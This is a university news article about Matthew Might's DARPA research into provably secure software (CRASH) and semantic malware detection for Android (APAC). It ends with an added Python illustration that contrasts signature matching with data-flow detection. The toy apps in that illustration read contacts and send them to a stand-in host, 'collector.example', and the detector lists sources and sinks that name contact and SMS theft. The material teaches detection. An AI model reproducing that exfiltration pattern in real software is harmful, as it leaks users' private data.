The Unhackable Dream

Pete Codella, Articles

Warning: This post may cause slight paranoia

In today’s world, nearly everything is accessible on the internet. While this creates an encyclopedic gateway to almost unlimited knowledge, it’s also a place where privacy is an anomaly, identities are stolen, top secret information is hacked and cyber wars are waged.

Dr. Matthew Might, an Associate Professor in the University of Utah’s School of Computing, is working on several projects for the military’s advanced research agency (DARPA) to create unhackable software.

Might is working on two projects geared to creating unhackable software. The first is Clean-Slate Design of Resilient, Adaptive, Secure Hosts (CRASH) and the second is called Automated Program Analysis for Cybersecurity (APAC). A University of Utah team is one of several nationally working on CRASH.


CRASH: Clean-Slate Design of Resilient, Adaptive, Secure Hosts

The basis of the CRASH program is to create new computer systems that are resistant to cyber-attack. For Might, the best way to prevent hacking is to approach software coding the way a mathematician would approach a theorem.

“We have the same level of trust in the software we write that the mathematician would in, say, the Pythagorean Theorem,” Might said. “That is to say, the Pythagorean Theorem will be true forever and the software that we write will be secure forever because it’s that level of guarantee. Again, the downside to something like this is that it’s really expensive to produce.”

One way to prevent the insertion of malicious code is to make sure the software is free of any flaws or weaknesses that would make it susceptible to attack. Might approaches the problem from a different angle than the typical anti-malware software people have on their computers.

Might’s goal is to keep things affordable by scaling between two approaches: one approach is to make the software do exactly what it says it will do by mathematically proving the absence of all bugs, thereby fully securing the software (at great cost); a complementary approach ensures that any bugs remaining in the software cannot become exploitable security vulnerabilities.

“That’s the thing—aiming for cost effectiveness and security—that sets the Utah approach apart from other teams,” Might said. “While other teams want absolute security and correctness, we’re allowing flexibility, we’ll guarantee that the software is completely secure but programs can still crash. Whereas other teams are trying to say we’ll never let the program crash at all and the program will always do what it’s supposed to do.”

Might and his team have developed new programming languages, operating systems and even test applications. The redevelopment is useful not only for companies and businesses but for the military as well.

“So we have all the way up to a secure webserver built on top of our system,” Might said. Might then gestured to an off-the-shelf router as he said, “We’ve been able to install our software stack on devices like this off-the-shelf Linksys router, so we can install our entire suite on here [gestures to the router] and we can give this to say military and this is absolutely secure.”


APAC: Automated Program Analysis for Cybersecurity

The second project Might is working on is called Automated Program Analysis for Cybersecurity (APAC).

APAC specifically targets malware in mobile phones. Currently, the military wants every soldier to have an Android device and to have access to an app store for military grade applications for soldiers. They would even like to allow third parties to contribute to the app store. However, this immediately opens up the possibility for adversaries to put malicious code into the app store.

The military has contracted with researchers like Might to create malware detectors that are more sophisticated than the malware detectors on the market today.

The typical malware detector looks for a specific sequence of words (a signature) within the application’s code. The problem is that this is not foolproof: someone can take an existing piece of malware and modify it ever so slightly, the signature changes, and the malware passes right through all the signatures that have been built up. There are millions of modified or new malicious programs and only so many good guys battling to find them.

“So, if we’re going to give soldiers these devices, if their lives are going to depend on these things, we have to give them an entirely new way of detecting malware that is impervious to the faults of the previous regime,” Might said.

The approach the military wants to use to prevent malware infiltration is semantic-based malware detection. Rather than signatures that look for a specific sequence of words in the source code, they want to take an application and look at what it is going to do: scan the behaviors of the software, not just its source code, so they can see exactly what the software will do.

Once an application is scanned, the tool built by Might’s team reports back all the points in the program’s potential execution where some kind of malicious behavior appears to be happening. It is then up to a human analyst to determine whether that behavior is actually malicious. While malware detection cannot be fully automated, the team is trying to make it as automated as possible.
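To make the contrast between signature and semantic detection concrete, here is an added illustration (not Might’s tool or any DARPA code). It uses a constructed toy call-trace language rather than real Android code: a text signature matches one program and misses a trivially edited copy, while a simplified behaviour abstraction with data-flow tracking, a stand-in for semantic analysis, flags both and reports each finding as a point for an analyst to review. The behaviour categories are assumptions for this toy language.

```python
import re

# Constructed toy "apps" in a simplified call-trace language (not Android
# bytecode). V2 has the same behaviour as V1 with renamed variables and a
# no-op inserted, the kind of trivial edit that defeats a text signature.
APP_V1 = """
c = read_contacts()
s = net_send("http://collector.example", c)
"""
APP_V2 = """
tmp0 = read_contacts()
x = x + 0
r = net_send("http://collector.example", tmp0)
"""
# Benign app: reads contacts but only shows them locally.
APP_BENIGN = """
c = read_contacts()
v = show_list(c)
"""

# Signature-based detection: an exact text pattern taken from V1.
SIGNATURE = 'c = read_contacts()\ns = net_send("http://collector.example", c)'

def signature_match(code: str, signature: str) -> bool:
    return signature in code.strip()

# Semantic detection: abstract calls to behaviour classes and follow the
# data. The categories below are assumed for this toy language.
SENSITIVE_SOURCES = {"read_contacts", "read_sms", "get_location"}
NETWORK_SINKS = {"net_send", "http_post"}
CALL = re.compile(r"^\s*(\w+)\s*=\s*(\w+)\((.*)\)\s*$")

def find_suspicious_flows(code: str):
    """Return (line, sink, tainted_args) for every network call that
    receives data derived from a sensitive source. Each finding is a
    point for a human analyst to review, not an automatic verdict."""
    tainted, findings = set(), []
    for lineno, line in enumerate(code.strip().splitlines(), 1):
        m = CALL.match(line)
        if not m:            # arithmetic and no-ops carry no behaviour
            continue
        dst, fn, args = m.groups()
        arg_names = {a.strip() for a in args.split(",")}
        from_tainted = sorted(arg_names & tainted)
        if fn in SENSITIVE_SOURCES:
            tainted.add(dst)
        elif fn in NETWORK_SINKS and from_tainted:
            findings.append((lineno, fn, from_tainted))
        elif from_tainted:   # taint propagates through other calls
            tainted.add(dst)
    return findings
```

The signature matches APP_V1 but not APP_V2; the flow analysis reports the network send in both and stays silent on the benign app.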


– Kaitlin Felsted, July 29, 2014